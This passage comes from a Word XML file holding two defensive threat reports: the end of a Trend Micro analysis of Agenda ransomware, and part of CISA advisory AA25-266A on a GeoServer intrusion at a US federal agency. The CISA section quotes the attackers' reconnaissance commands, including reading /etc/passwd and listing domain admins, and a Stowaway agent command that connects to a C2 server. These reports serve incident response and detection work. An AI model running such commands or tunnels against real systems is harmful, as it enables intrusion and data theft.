the vendor as "()" (translated: Thumb World (Beijing) Network Technology Co., Ltd.), which appears to be associated with the game.bb site. The driver likely belongs to a game-related package and is commonly used by cheat developers to evade anti-cheat systems; however, it could also be repurposed by advanced persistent threat actors.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4. Disassembly showing eskle.sys' anti-analysis capabilities, including virtual machine (VM) detection and debugging countermeasures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5. Disassembly showing eskle.sys' process termination capabilities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eskle.sys driver forcibly stops programs by creating a handle to the target process, starting a new thread to run a termination routine, and cleaning up the handle. This enables it to disable security software, disrupt system operations, and maintain persistence.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 additional component named msimg32.dll was identified in our internal telemetry alongside relations to ThrottleStop.sys. Further analysis through controlled testing revealed that msimg32.dll functions as a dropper that deploys two driver files when executed: C:\Users\Administrator.&lt;REDACTED&gt;\Downloads\msimg32.dll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Upon successful execution, the following drivers were dropped: %TEMP%\rwdrv.sys %TEMP%\hlpdrv.sys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connection is significant, as both rwdrv.sys and hlpdrv.sys have been previously documented in Akira campaigns for gaining kernel-level access and potentially terminating traditional endpoint detection and response (EDR) solutions. Analysis revealed that msimg32.dll employs a DLL sideloading technique, requiring a legitimate host executable for proper execution. The DLL failed to load through standard methods like regsvr32 or rundll32.</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testing confirmed successful loading when placed alongside compatible binaries, such as FoxitPDFReader.exe, which imports msimg32.dll as a dependency. Upon execution, the application loads the malicious DLL, which then drops both driver files to the system's temporary directory, as shown in Figure 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6. File system view showing hlpdrv.sys and rwdrv.sys dropped by msimg32.dll in the Windows Temp directory after DLL sideloading execution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Additionally, we observed and analyzed three other executables (cg6.exe, 44a.exe, aa.exe) that were identified as potential anti-AV tools based on their behavioral patterns and code similarities. Analysis revealed that these executables contain driver-loading routines and process manipulation capabilities consistent with BYOVD techniques. These tools are suspected to utilize a different vulnerable driver (fnarw.sys), though definitive confirmation remains pending as the driver was unavailable for complete analysis: C:\Users\&lt;REDACTED&gt;\Desktop\cg6.exe C:\Users\&lt;REDACTED&gt;\Desktop\44a.exe C:\Users\&lt;REDACTED&gt;\Desktop\aa.exe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Lateral Movement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Multiple PuTTY SSH clients were systematically deployed on compromised systems to facilitate lateral movement to Linux systems within the environment. The attackers staged these tools with different filenames but identical functionality: C:\Users\&lt;REDACTED&gt;\Desktop\test.exe C:\Users\&lt;REDACTED&gt;\Desktop\1.exe C:\Users\&lt;REDACTED&gt;\Desktop\2.exe C:\Users\&lt;REDACTED&gt;\Desktop\3.exe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These renamed PuTTY executables enabled the attackers to establish SSH connections to Linux infrastructure, expanding their reach beyond Windows systems and demonstrating the cross-platform nature of the attack.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7. PuTTY SSH client interface, deployed under various filenames (e.g., test.exe, 1.exe, 2.exe, 3.exe) on compromised systems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Command and Control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threat actors established a C&amp;C infrastructure through the deployment of multiple SOCKS proxy instances, identified as COROXY backdoor. These proxies were systematically placed across various system directories to create a distributed network of communication channels that obfuscated malicious traffic patterns and evaded network monitoring solutions.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attackers positioned these SOCKS proxies in directories associated with legitimate enterprise software, including Veeam backup solutions, VMware virtualization infrastructure, and Adobe applications. This placement strategy served a dual purpose: blending malicious C&amp;C traffic with normal application communications while exploiting the trust typically afforded to these well-known software vendors in enterprise environments.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">C:\ProgramData\Veeam\socks64.dll C:\ProgramData\USOShared\socks64.dll </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>C:\ProgramData\VMware\logs\socks64.dll C:\ProgramData\Adobe\socks64.dll C:\ProgramData\Veeam\Backup\OracleLogBackup\socks64.dll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distributed nature of this SOCKS proxy deployment provided the attackers with redundant communication channels, ensuring persistent C&amp;C capabilities even if individual proxies were discovered and removed. Each proxy instance functioned as an independent tunnel for encrypted communications, allowing the threat actors to maintain remote access, exfiltrate data, and orchestrate subsequent attack stages while remaining concealed within legitimate network traffic flows.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Impact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final ransomware deployment showcased cross-platform execution. WinSCP was utilized for secure file transfer of the Linux ransomware binary to the Windows system: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C:\Users\&lt;REDACTED&gt;\AppData\Local\Programs\WinSCP\WinSCP.exe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C:\Users\&lt;REDACTED&gt;\Desktop\mmh_linux_x86-64.filepart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C:\Users\&lt;REDACTED&gt;\Desktop\mmh_linux_x86-64</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Unique to the technique was the use of Splashtop Remote's management service (SRManager.exe) to execute the Linux ransomware binary directly on Windows systems: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C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRManager.exe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C:\Users\&lt;REDACTED&gt;\Desktop\mmh_linux_x86-64</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unconventional approach used Splashtop's remote execution capabilities to run the cross-platform payload, bypassing traditional Windows-focused security controls. The execution method is significant, as most endpoint detection systems are not configured to monitor or prevent Linux binaries being executed through legitimate remote management tools on Windows platforms. The Linux ransomware binary provided cross-platform capability, allowing the attackers to impact both Windows and Linux systems within the environment using a single payload.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Linux variant ransomware analysis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Analysis of the Linux ransomware binary revealed an advanced cross-platform payload with extensive configuration capabilities and platform-specific targeting.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8. Ransom note extracted from the binary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ransomware deployed a standard Agenda ransom note threatening data publication and providing victim-specific credentials for negotiation. The note included file extension, and domain/login/password fields for accessing the threat actors' communication portal.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9. Command-line parameters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binary implemented comprehensive command-line options including debug mode (-d), logging levels (-l), path specifications (-p), whitelist configurations, and encryption control parameters. Notable features included timer delays (-t) for delayed execution and a "yes" mode (-y) for automated operation without user prompts, indicating operational maturity.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10. Screenshot showing how the application outputs its configuration to the console upon launch; a password must also be provided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Execution required password authentication and displayed verbose configuration output including whitelisted processes, file extension blacklists, and path exclusions. The configuration showed extensive targeting of VMware ESXi paths (/vmfs/, /dev/, /lib64/) while excluding critical system directories, demonstrating hypervisor-focused deployment strategies.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11. OS detection from previous variants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Earlier variants implemented OS detection for FreeBSD, VMkernel (ESXi), and standard Linux distributions, enabling platform-specific encryption behavior, as shown in Figure 13.</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12. Recent sample with added OS checking for Nutanix</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Updated samples incorporated Nutanix AHV detection, expanding targeting to include hyperconverged infrastructure platforms. This demonstrated the threat actors' adaptation to modern enterprise virtualization environments beyond traditional VMware deployments.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13. Old sample with its logging routine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14. New sample with minor modification in its logging routine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Comparison of logging routines revealed incremental improvements in error handling, with newer variants implementing enhanced file operation logging and fallback mechanisms for failed log file creation. The modifications included additional error messages and improved diagnostic output for troubleshooting deployment issues. The Linux variant's advanced capability, combined with cross-platform deployment via Splashtop Remote, represented significant tactical evolution targeting hybrid infrastructure environments.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Security best practices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Agenda attack shows how ransomware operators are further weaponizing legitimate IT tools and hybrid environments to quietly bypass conventional security. Defenses must address operational blind spots and strengthen visibility and control over critical assets. Here are some best practices: Secure remote access and RMM tools. Limit RMM platforms to authorized management hosts and enforce MFA. Monitor for abnormal activity, such as logins outside business hours or lateral movement between unexpected endpoints. Consider restricting what applications or scripts are allowed to run on specific systems to reduce the risk of abusing legitimate binaries for malicious activity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Harden the backup infrastructure. Targeted backup systems to steal credentials and disable recovery. Segment </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>backup networks, enforce the principle of least privilege, rotate admin credentials as needed, and monitor for the suspicious use of administrative tools such as PowerShell or SQL queries interacting with backup credentials. Consider token or account revocation mechanisms to contain compromise if credentials are exposed.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Account for detecting BYOVD and cross-platform threats. BYOVD attacks involve threat actors installing legitimate but vulnerable drivers to escalate privileges, disable security controls, or hide activity. These are risky because they exploit trusted components, often bypassing traditional AV/EDR. Monitor for unsigned or unexpected driver loads, DLL sideloading, and Linux binary execution on Windows through remote tools. Expand detection rules to cover payloads not native to the system.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Extend visibility across hybrid environments. Ensure that the organization's EDR and SOC playbooks include both Windows and Linux telemetry and actively monitor internal lateral movement to detect early stages of hybrid ransomware attacks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Protect credentials and access tokens. Apply phishing-resistant MFA, strengthen conditional access policies, and monitor for abnormal use of privileged accounts or tokens.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Proactive Security with Trend Vision OneTM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 Vision OneTM is the only AI-powered enterprise cybersecurity platform that centralizes cyber risk exposure management and security operations, delivering robust layered protection across on-premises, hybrid, and multi- cloud environments.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 Vision One Threat Intelligence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 stay ahead of evolving threats, Trend customers can access Trend Vision OneTM Threat Insights which provides the latest insights from TrendTM Research on emerging threats and threat actors.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 Vision One Threat Insights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Threat Actors: Water Galura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Emerging Threats: Agenda Ransomware Deploys Linux Variant on Windows Systems through Remote Management Tools and BYOVD Techniques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 Vision One Intelligence Reports (IOC Sweeping)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Agenda Ransomware Deploys Linux Variant on Windows Systems through Remote Management Tools and BYOVD Techniques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Hunting Queries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 Vision One Search App</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 Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post with data in their environment.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Outbound Connection to Suspicious Remote Host on Port 4396 - Agenda Ransomware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eventSubId: 204 AND dst: 146.70.104.163 AND dpt: 4396 AND LogType: detection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hunting queries are available for Trend Vision One customers with Threat Insights entitlement enabled.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Indicators of Compromise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Indictors of compromise can be found here.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trend Micro 2025.10.23 15:05</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.trendmicro.com/en_us/research/25/j/agenda-ransomware-deploys-linux-variant-on-windows-systems.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>CISA Shares Lessons Learned from an Incident Response Engagement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Release Date September 23, 2025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Alert Code AA25-266A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Advisory at a Glance Executive Summary CISA began incident response efforts at a U.S. federal civilian executive branch (FCEB) agency following the detection of potential malicious activity identified through security alerts generated by the agency's endpoint detection and response (EDR) tool. CISA identified three lessons learned from the engagement that illuminate how to effectively mitigate risk, prepare for, and respond to incidents: vulnerabilities were not promptly remediated, the agency did not test or exercise their incident response plan (IRP), and EDR alerts were not continuously reviewed.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Key Actions Prevent compromise by prioritizing the patching of critical vulnerabilities in public-facing systems and known exploited vulnerabilities.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Prepare for incidents by maintaining, practicing, and updating incident response plans.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Prepare for incidents by implementing comprehensive and verbose logging and aggregate logs in a centralized out-of-band location.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Indicators of Compromise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a downloadable copy of indicators of compromise, see: AA25-266A-JSON.stix_.json AA25-266A-STIX.stix_.xml Intended Audience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Organizations: FCEB agencies and critical infrastructure organizations.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Roles: Defensive Cybersecurity Analysts, Vulnerability Analysts, Security Systems Managers, Systems Security Analysts, and Cybersecurity Policy and Planning Professionals.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Download the PDF version of this report AA25-266A advisory cisa shares lessons learned from ir engagement Introduction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Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Cybersecurity Advisory to highlight lessons learned from an incident response engagement CISA conducted at a U.S. federal civilian executive branch (FCEB) agency. CISA is publicizing this advisory to reinforce the importance of prompt patching, as well as preparing for incidents by practicing incident response plans and by implementing logging and aggregating logs in a centralized out-of-band location. CISA is also raising awareness about the tactics, techniques, and procedures (TTPs) employed by these cyber threat actors to help organizations safeguard against similar exploits.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CISA began incident response efforts at an FCEB agency after the agency identified potential malicious activity through security alerts generated by the agency's endpoint detection and response (EDR) tool. CISA discovered cyber threat actors compromised the agency by exploiting CVE-2024-36401 in a GeoServer about three weeks prior to the EDR alerts. Over the three-week period, the cyber threat actors gained separate initial access to a second GeoServer via the same vulnerability and moved laterally to two other servers.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Leveraging insights CISA gleaned from the organization's security posture and response, CISA is sharing lessons learned for organizations to mitigate similar compromises (see Lessons Learned for more details): Vulnerabilities were not promptly remediated.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The cyber threat actors exploited CVE-2024-36401 for initial access on two GeoServers.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The vulnerability was disclosed 11 days prior to the cyber threat actors accessing the first GeoServer and 25 days prior to them accessing the second GeoServer.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The agency did not test or exercise their incident response plan (IRP), nor did their IRP enable them to promptly engage third parties and grant third parties access to necessary resources.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>This delayed certain elements of CISA's response as the IRP did not have procedures for involving third-party assistance or for granting third-party access to their security tools.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>EDR alerts were not continuously reviewed, and some public-facing systems lacked endpoint protection.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The activity remained undetected for three weeks; the agency missed an opportunity to detect this activity earlier as they did not observe an alert from a GeoServer and the Web Server did not have endpoint protection.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These lessons highlight strategies to effectively mitigate risk, enhance preparedness, and respond to incidents with greater efficiency. CISA encourages all organizations to consider the lessons learned and apply the associated recommendations in the Mitigations section of this advisory to improve their security posture.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advisory also provides the cyber threat actors' TTPs and indicators of compromise (IOCs). For a downloadable copy of IOCs, see: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AA25-266A-JSON.stix_.json AA25-266A-STIX.stix_.xml Technical Details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Note: This advisory uses the MITRE ATT&amp;CK(R) Matrix for Enterprise framework, version 17. See the MITRE ATT&amp;CK Tactics and Techniques section of this advisory for a table of the threat actors' activity mapped to MITRE ATT&amp;CK tactics and techniques. Threat Actor Activity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CISA responded to a suspected compromise of a large FCEB agency after the agency's security operations center (SOC) observed multiple endpoint security alerts.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During the incident response, CISA discovered that cyber threat actors gained access to the agency's network on July 11, 2024, by exploiting GeoServer vulnerability CVE 2024-36401 [CWE-95: "Eval Injection"] on a public-facing GeoServer (GeoServer 1). This critical vulnerability, disclosed June 30, 2024, allows unauthenticated users to gain remote code execution (RCE) on affected GeoServer versions [1]. The cyber threat actors used this vulnerability to download open source tools and scripts and establish persistence in the agency's network. (CISA added this vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog on July 15, 2024.)</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gaining initial access to GeoServer 1, the cyber threat actors gained separate initial access to a second GeoServer (GeoServer 2) on July 24, 2024, by exploiting the same vulnerability. They moved laterally from GeoServer 1 to a web server (Web Server) and then a Structured Query Language (SQL) server. On each server, they uploaded (or attempted to upload) web shells such as China Chopper, along with scripts designed for remote access, persistence, command execution, and privilege escalation. The cyber threat actors also used living off the land (LOTL) techniques.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See Figure 1 for an overview of the cyber threat actors' activity and the following sections for detailed threat actors TTPs.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 Overview of Threat Actor Activity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Reconnaissance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cyber threat actors identified CVE-2024-36401 in the organization's public-facing GeoServer using Burp Suite Burp Scanner [T1595.002]. CISA detected this scanning activity by analyzing web logs and identifying signatures associated with the tool. Specifically, CISA observed domains linked to Burp Collaborator-a component of Burp Suite used for vulnerability detection-originating from the same IP address the cyber threat actors later used to exploit the GeoServer vulnerability for initial access. Resource Development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The cyber threat actors used publicly available tools to conduct their malicious operations. In one instance, they gained remote access to the organization's network and leveraged a commercially available virtual private server (VPS) from a cloud infrastructure provider [T1583.003]. Initial Access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 gain initial access to GeoServer 1 and GeoServer 2, the cyber threat actors exploited CVE 2024-36401 [T1190]. They leveraged this vulnerability to gain RCE by performing "eval injection," a type of code injection that allows an untrusted user's input to be evaluated as code. The cyber threat actors likely attempted to load a JavaScript extension to gain webserver information as an Apache wicket on GeoServer 1. However, their efforts were likely unsuccessful, as CISA observed attempts to access the .js file returning 404 responses in the web logs, indicating that the server could not find the requested URL. Persistence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cyber threat actors primarily used web shells [T1505.003] on internet- facing hosts, along with cron jobs (scheduled commands that run automatically at specified times) [T1053.003], and valid accounts [T1078] for persistence. CISA also identified the creation of accounts-although these accounts were later deleted-with no evidence indicating further use. Privilege Escalation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cyber threat actors attempted to escalate privileges with the publicly available dirtycow tool [2], which can be used to exploit CVE-2016-5195 [CWE-362: "Race Condition"] [T1068]. After compromising web service accounts, they escalated their local privileges to transition away from these service accounts (it is unknown how they escalated privileges).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Note: CVE-2016-5195 affects Linux kernel 2.x through 4.x before 4.8.3 and allows users to escalate privileges. CISA added this CVE to its KEV Catalog on March 3, 2022. Defense Evasion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 evade detection, the cyber threat actors employed indirect command execution via .php web shells and xp_cmdshell [T1202] and abused Background Intelligence Transfer Service (BITS) jobs [T1197]. CISA also observed files on GeoServer 1 named RinqQ.exe and RingQ.rar, which likely refer to a publicly available defense evasion tool called RingQ [3], that the cyber threat actors staged for potential use.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Note: CISA could not recover most of the files on the host to confirm their contents. Credential Access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Once inside the organization's network, the cyber threat actors primarily relied on brute force techniques [T1110] to obtain passwords for lateral movement and privilege escalation. They also accessed service accounts by exploiting their associated services. Discovery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gaining initial access, the cyber threat actors conducted discovery to facilitate lateral movement. They performed ping sweeps of hosts within specific subnets [T1018] and downloaded the fscan tool [4] to scan the organization's network. CISA identified the use of the fscan tool by analyzing evidence of its output found on disk. (Note: fscan is publicly available on GitHub and is capable of port scanning, fingerprinting, and web vulnerability detection-among other functions.) Between July 15 and 31, 2024, the cyber threat actors conducted extensive network and vulnerability scanning using fscan and linux-exploit-suggester2.pl. CISA's host forensics analysts uncovered this activity by reviewing remnants the cyber threat actors left on disk. GeoServer 1</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cyber threat actors leveraged CVE-2024-36401 to execute the following host discovery commands on GeoServer 1: uname-a df-h env ps -aux ipconfig [T1016] date who -b rpm -qa polkit netstat -ano [T1049]</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Additionally, they employed LOTL techniques for user, service, filesystem, and network discovery on GeoServer 1: cat /etc/passwd [T1087.001] cat /etc/resolv.conf cat /usr/local/apache-tomcat-9.0.89/webapps/geoserver/WEB-INF/web.xml cat /etc/redhat-release [T1082] cat /etc/os-release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cyber threat actors then used curl commands to download a shell script named mm.sh (which they renamed to aa.sh) and a zip file named aaa.zip to the /tmp/ directory.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Subsequently, they enumerated the internal network from GeoServer 1, identifying Secure Shell (SSH) listeners, File Transfer Protocol (FTP) servers, file servers, and web servers [T1046] by using the fscan tool. (Note: CISA observed endpoint logs that showed the cyber threat actors uploaded fscan to the compromised host and ran it against internal systems.) The actors then attempted to brute force login credentials for the exploited web services to gain remote access, achieve RCE, or move laterally.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cyber threat actors also conducted ping sweeps of several hosts within the organization's internal subnets using fscan. Their use of the -nobr and -nopoc flags for fscan indicated that this scan excluded brute forcing or vulnerability scanning, respectively. SQL Server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CISA observed the following discovery commands on the organization's SQL server: whoami [T1033] ipconfig /all ping -n 1 8.8.8.8 systeminfo tasklist [T1057] dir c:\ [T1083] dir c:\Users type c:\Last.txt type c:\inetpub\wwwroot type c:\inetpub\ dir c:\inetpub\wwwroot dir c:\ dir c:\ifwapps dir d:\ dir e:\ net group "domain admins" /domain type C:\Windows\System32\inetsrv\config\applicationHost.config dir c:\ifwapps\Tier1Utilities netstat -ano curl net user tasklist GeoServer 2</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Based on images CISA received of GeoServer 2, CISA observed the bash history of a user that showed the use of Burp Collaborator to execute encoded host and network discovery commands. Lateral Movement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one instance, the cyber threat actors moved laterally from the Web Server to the SQL Server by enabling xp_cmdshell for RCE on GeoServer 1. Command and Control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cyber threat actors used PowerShell [T1059.001] and bitsadmin getfile to download payloads [T1105].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They used Stowaway [5], a publicly available multi-level proxy tool, to establish C2 [T1090]. Stowaway enabled the cyber threat actors to bypass the organization's intranet restrictions and access internal network resources by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>forwarding traffic from their C2 server through the Web Server. They wrote Stowaway to disk using a tomcat service account.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actors then executed Stowaway via /var/tmp/agent -c 45.32.22[.]62:4441 - s f86bc7ff68aff3ad -up http -reconnect 10.</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 test their level of access, the cyber threat actors performed a ping sweep of multiple hosts in a particular subnet of the organization's network. Next, the cyber threat actors downloaded a modified version of Stowaway using a curl command, successfully establishing an outbound connection with their C2 server using HTTP over TCP/4441.</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 July 14, 2024, the cyber threat actors executed /tmp/mm.sh on the Web Server followed by an encoded command to execute Stowaway. The contents of this file could not be recovered. Additionally, they used Stowaway to establish a second C2 connection over TCP/50012, likely serving as a backup C2 channel.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CISA discovered evidence of various files hosted on the C2 server, including numerous publicly available tools and scripts: RingQ antivirus defense evasion tool (RingQ.exe, RingQ.rar) IOX proxy tool (iox.rar) BusyBox trojan multi-tool (busybox) WinRAR archive tool (Rar.exe) Stowaway proxy tool (agent, agent.tar, agent.zip, agentu.exe) Web shells (Handx.ashx, start_tomcat.jsp) Various shell scripts (mm.sh, t.py, t1.sh, c.bat) Detection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cyber threat actors remained undetected in the organization's environment for three weeks before the organization's SOC identified the compromise using their EDR tool. On July 31, 2024, their EDR tool identified a 1.txt file uploaded as suspected malware on the SQL Server. The SOC responded to additional alerts when the cyber threat actors transferred 1.txt to the SQL Server through bitsadmin after attempting other LOTL techniques, such as leveraging PowerShell and certutil. The alerts generated by this activity on the SQL server prompted the SOC to contain the server, initiate an investigation, request assistance from CISA, and uncover malicious activity on GeoServer 1. Lessons Learned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CISA is sharing the following lessons learned based on what CISA learned about the organization's security posture through incident detection and response activities.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Vulnerabilities were not promptly remediated.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The cyber threat actors exploited CVE-2024-36401 for initial access on two GeoServers.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The vulnerability was disclosed June 30, 2024, and the cyber threat actors exploited it for initial access to GeoServer 1 on July 11, 2024.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The vulnerability was added to CISA's KEV Catalog on July 15, 2024, and by July 24, 2024, the vulnerability was not patched when the cyber threat actors exploited it for access to GeoServer 2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Note: FCEB agencies are required to remediate vulnerabilities in CISA's KEV Catalog within prescribed timeframes under Binding Operational Directive (BOD) 22-01. July 24, 2024, was within the KEV-required patching window for this CVE. However, CISA encourages FCEB agencies and critical infrastructure organizations to address KEV catalog vulnerabilities immediately as part of their vulnerability management plan.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The agency did not test or exercise their IRP, nor did their IRP enable them to promptly engage third parties and grant third parties' access to necessary resources.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>On Aug. 1, 2024, upon discovering the endpoint alerts, the agency conducted remote triage of affected systems and used their EDR tool to contain the intrusion.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>After containment, the agency engaged CISA to investigate potential threat actor persistence in their environment.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
